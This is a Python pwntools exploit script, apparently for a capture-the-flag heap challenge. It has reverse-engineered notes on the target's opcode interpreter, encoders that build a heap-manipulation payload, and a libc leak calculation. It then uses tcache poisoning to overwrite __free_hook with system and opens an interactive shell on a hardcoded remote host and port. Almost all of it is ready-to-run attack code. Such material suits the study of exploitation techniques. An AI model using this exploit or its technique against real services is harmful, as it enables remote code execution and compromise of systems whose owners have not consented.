1 |
|
import struct

from pwn import*
3 |
|
4 | ''' |
5 | func_table: [0x14018 + proc_base] |
6 | opcode_table: [0x13FE8 + proc_base] |
7 | 0x0: 0x4D-> |
8 | calloc(location,1); |
9 | calloc(timeS,1); |
10 | opcode +=3; |
11 | |
0x1: 0x2A->add; just one time;
13 | p8(index0) + p8(index1)+p16(Size); opcode+=5 |
14 | 0x2: 0x2F-> |
15 | free(); |
16 | p8(index0) + p8(index1); opcode+=3 |
17 | 0x3: 0x2B-> |
18 | Set the Location; |
19 | p8(index0) + p8(index1) + p8(Location); opcode+=4 |
20 | 1 < Size <= 4; |
21 | 0x4: 0x2D-> |
Set the Location to 0;
23 | p8(index0) + p8(index1); opcode +=3 |
24 | 0 0 0 0 0 0 0 0 0 0 |
25 | 0 0 0 0 0 0 0 0 0 0 |
26 | 0 0 0 0 0 0 0 0 0 0 |
27 | 0 0 0 0 0 0 0 0 0 0 |
28 | 0 0 0 0 0 0 0 0 0 0 |
29 | 0 0 0 0 0 0 0 0 0 0 |
30 | 0 0 0 0 0 0 0 0 0 0 |
31 | 0 0 0 0 0 0 0 0 0 0 |
32 | 0 0 0 0 0 0 0 0 0 0 |
33 | 0 0 0 0 0 0 0 0 0 0 |
34 |
|
0x5: 0x77->
opcode++; Up    -> 2,3->2; or 0->1;
0x6: 0x73->
opcode++; Down  -> 2,3->2; or 0->1;
0x7: 0x61->
opcode++; Left  -> 2,3->2; or 0->1;
0x8: 0x64->
opcode++; Right -> 2,3->2; or 0->1;
43 | 0x9: 0x70-> |
44 | show;opcode++; |
45 | 0xA: 0x00->Exit |
46 | 0xB: 0x01->default;opcode++; |
47 |
|
48 | ''' |
49 |
|
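# Exploit for the opcode-driven heap challenge described in the notes above.
#
# Every byte that goes on the wire is a ``bytes`` object, so the script runs
# under Python 3 pwntools as well as Python 2: the original used ``str``
# literals, which pwntools re-encodes with a warning and which make
# ``bytes.ljust(8, '\x00')`` and ``'\x00' * 0x100 + p64(...)`` raise
# TypeError on Python 3.  The opcode stream is assembled by small encoders
# that follow the opcode_table notes, so the heap dance is readable and the
# byte layout is testable without a target.
HOST = '8.140.179.11'
PORT = 13422
LIBC_PATH = './libc-2.27.so'

# Opcode bytes of the target's interpreter (see the opcode_table notes above).
OP_INIT = 0x4D   # calloc(location,1); calloc(timeS,1)     -- 3 bytes
OP_ADD = 0x2A    # allocate at (index0, index1), size u16 -- 5 bytes
OP_FREE = 0x2F   # free (index0, index1)                  -- 3 bytes
OP_SET = 0x2B    # set the Location of (index0, index1)   -- 4 bytes
OP_UP = 0x77     # 'w'
OP_DOWN = 0x73   # 's'
OP_LEFT = 0x61   # 'a'
OP_RIGHT = 0x64  # 'd'
OP_SHOW = 0x70   # 'p'
OP_EXIT = 0x00

# Author-derived constants for turning the printed pointer into libc base.
# The OR presumably restores bits that the printed leak drops; the
# subtraction is the distance from the leaked pointer to the base of
# libc-2.27.so.  Both are challenge-specific -- re-derive them if the libc
# or the binary changes.
LEAK_FIXUP_BITS = 0x4000000000
LEAK_TO_LIBC_BASE = 0xF10 + 0x154000


def op_init(location, times):
    """Encode 0x4D: calloc(location, 1); calloc(times, 1).  Both are u8."""
    return struct.pack('<BBB', OP_INIT, location, times)


def op_add(index0, index1, size):
    """Encode 0x2A: allocate ``size`` bytes at (index0, index1); size is LE u16."""
    return struct.pack('<BBBH', OP_ADD, index0, index1, size)


def op_free(index0, index1):
    """Encode 0x2F: free the chunk at (index0, index1)."""
    return struct.pack('<BBB', OP_FREE, index0, index1)


def op_set(index0, index1, location):
    """Encode 0x2B: set the Location of (index0, index1) to ``location`` (u8)."""
    return struct.pack('<BBBB', OP_SET, index0, index1, location)


def op_repeat(opcode, count=1):
    """Encode a one-byte opcode (move / show / exit) ``count`` times."""
    return struct.pack('<B', opcode) * count


def build_payload():
    """Return the complete opcode stream sent at the ``cmd> `` prompt.

    The byte sequence is exactly the one the original script sent; the
    comments describe what each instruction does per the notes above, not
    why the author chose it.  Note that op_set is issued with indices
    0x0E/0x0F, which lie outside the 10x10 grid sketched in the notes --
    presumably this is where the bug is triggered (confirm against the
    binary).
    """
    return b''.join([
        op_init(0x10, 0x10),
        op_add(0, 4, 0x4F0),
        op_add(0, 5, 0x10),
        op_free(0, 4),
        op_add(0, 4, 0xF0),
        op_repeat(OP_SHOW),                          # prints "pos:0,4" + leak
        op_repeat(OP_DOWN, 0xE),
        (op_repeat(OP_RIGHT) + op_repeat(OP_LEFT)) * 0x36,
        op_repeat(OP_RIGHT, 6),
        op_set(0x0E, 0x07, 3),
        op_repeat(OP_RIGHT),
        op_set(0x0F, 0x08, 3),
        op_repeat(OP_DOWN),
        op_add(0, 6, 0x70),
        op_add(0, 7, 0x370),
        op_free(0, 6),
        op_free(0, 4),
        op_add(0, 4, 0x170),
        op_add(0, 6, 0x70),
        op_add(0, 8, 0x70),
        op_free(0, 6),
        op_repeat(OP_EXIT),
    ])


def libc_base_from_leak(leak):
    """Convert the raw bytes printed after ``pos:0,4`` into the libc base.

    ``leak`` is at most 8 bytes (little-endian pointer with trailing NUL
    bytes stripped by the target's printing).  Raises ValueError when the
    line is longer than a pointer, which means the leak line was not what
    this script expects and the following arithmetic would be garbage.
    """
    if len(leak) > 8:
        raise ValueError('leak is longer than a pointer: %r' % (leak,))
    value = struct.unpack('<Q', leak.ljust(8, b'\x00'))[0]
    return (value | LEAK_FIXUP_BITS) - LEAK_TO_LIBC_BASE


def main():
    """Leak libc, then overwrite __free_hook with system and drop to a shell."""
    libc = ELF(LIBC_PATH)
    p = remote(HOST, PORT)

    p.sendlineafter(b'cmd> ', build_payload())
    # Inputs the program reads after the opcode stream; their meaning is not
    # recorded in the notes above -- check the binary.  The sleeps pace the
    # writes because there is no prompt to synchronise on.
    sleep(0.1)
    p.sendline(b'FMYY')
    sleep(0.1)
    p.sendline(b'FMYY')
    sleep(0.1)
    p.send(b'\x10')

    p.recvuntil(b'pos:0,4\n')
    leak = p.recvuntil(b'\n', drop=True)
    log.info('LEAK:\t' + repr(leak))
    libc_base = libc_base_from_leak(leak)
    log.info('LIBC:\t' + hex(libc_base))
    log.info('__malloc_Hook:\t' + hex(libc_base + libc.sym['__malloc_hook']))
    system_addr = libc_base + libc.sym['system']
    free_hook = libc_base + libc.sym['__free_hook']
    log.info('__free_hook:\t' + hex(free_hook))

    # Presumably tcache poisoning: 0x100 bytes of padding followed by the
    # forward pointer redirected to __free_hook, then "/bin/sh" lands in the
    # first chunk and system() in the chunk served from __free_hook.  The
    # exact chunk layout depends on the heap dance in build_payload; confirm
    # with a debugger if the target changes.
    p.sendline(b'FMYY')
    sleep(0.1)
    p.sendline(b'FMYY')
    sleep(0.1)
    p.sendline(b'\x00' * 0x100 + p64(free_hook))
    sleep(0.1)
    p.sendline(b'/bin/sh\x00')
    sleep(0.1)
    p.sendline(p64(system_addr))
    sleep(0.1)

    p.interactive()


if __name__ == '__main__':
    main()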